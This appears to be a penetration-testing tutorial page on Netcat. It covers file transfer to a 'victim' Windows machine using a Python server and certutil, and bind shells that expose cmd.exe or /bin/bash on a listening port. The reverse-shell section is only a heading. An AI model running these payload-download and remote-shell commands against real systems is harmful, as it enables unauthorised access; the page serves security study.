🐚Bind & Reverse Shells

Netcat Fundamentals

Netcat (Aka TCP/IP Swiss Army Knife) is a networking utility used to read and write data to network connections using TCP or UDP.
Netcat is available for both *NIX and Windows operating systems, consequently making it extremely useful for cross-platform engagements.
Netcat utilizes a client-server communication architecture with two modes:
- Client mode - Netcat can be used in client mode to connect to any TCP/UDP port as well as a Netcat listener (server).
- Server mode - Netcat can be used to listen for connections from clients on a specific port.
Netcat can be used by penetration testers to perform the following functionality:
- Banner Grabbing
- Port Scanning
- Transferring Files
- Bind/Reverse Shells </aside>

Usage of Netcat

The /usr/share/windows-binaries folder contains various Windows executables on Kali Linux. These files can be transferred to a victim's machine for exploitation.

Transferring Files from Kali Linux to Windows

Using Python HTTP Server and Certutil

Prepare Files:
- Locate Windows executables in "/usr/share/windows-binaries" on Kali Linux.
Host File on Python Server:
- Start a Python HTTP server:
  python3 -m http.server
- Files can now be accessed via http://<your_ip>:8000/<filename>.

Download on Windows Using Certutil:

On the victim's Windows machine:

certutil -urlcache -f http://<your_ip>:8000/<filename> <file_name_to_save>

Using Netcat (nc) for Direct Transfer

Setup Netcat on Windows:
- Receive files using Netcat:
  nc.exe -nvlp 1234 > <output-file-name>
Send File from Kali Linux:
- Send file from Kali Linux to Windows:
  nc -nv <win_ip> 1234 < <file-to-share>
- Replace <win_ip> with the Windows machine's IP address.

Bind Shells

A bind shell is a type of remote shell where the attacker connects directly to a listener on the target system, consequently allowing for execution of commands on the target system.
A Netcat listener can be setup to execute a specific executable like cmd.exe or /bin/bash when a client connects to the listener.

Setting Up Bind Shells

Windows System

Establish Bind Shell:
```
nc.exe -nvlp 1234 -e cmd.exe
```
This command starts a Netcat listener (-l) on port 1234 (-p 1234) and executes (-e) cmd.exe upon connection, creating a bind shell.
Connect from Linux:
```
nc -nv <win_ip> <port>
```
Replace <win_ip> with the IP address of the Windows machine hosting the bind shell, and <port> with the port number (1234 in this example).

Linux System

Establish Bind Shell:
```
nc -nvlp 1234 -c /bin/bash
```
This command sets up a Netcat listener (-l) on port 1234 (-p 1234) and executes (-c) /bin/bash upon connection, creating a bind shell.
Connect from Windows:
```
nc.exe -nv <linux_ip> <port>
```
Replace <linux_ip> with the IP address of the Linux machine hosting the bind shell, and <port> with the port number (1234 in this example).

Reverse Shells

A reverse shell is a type of remote shell where the target connects directly to a listener on the attacker’s system, consequently allowing for execution of commands on the target system.

Reverse Shell Cheatsheet

Hacker's Mantra: Humiliation is the favorite currency of the hacker. - Sherlock Holmes

PreviousSearching For Exploits NextExploitation Frameworks

Last updated 1 year ago

Was this helpful?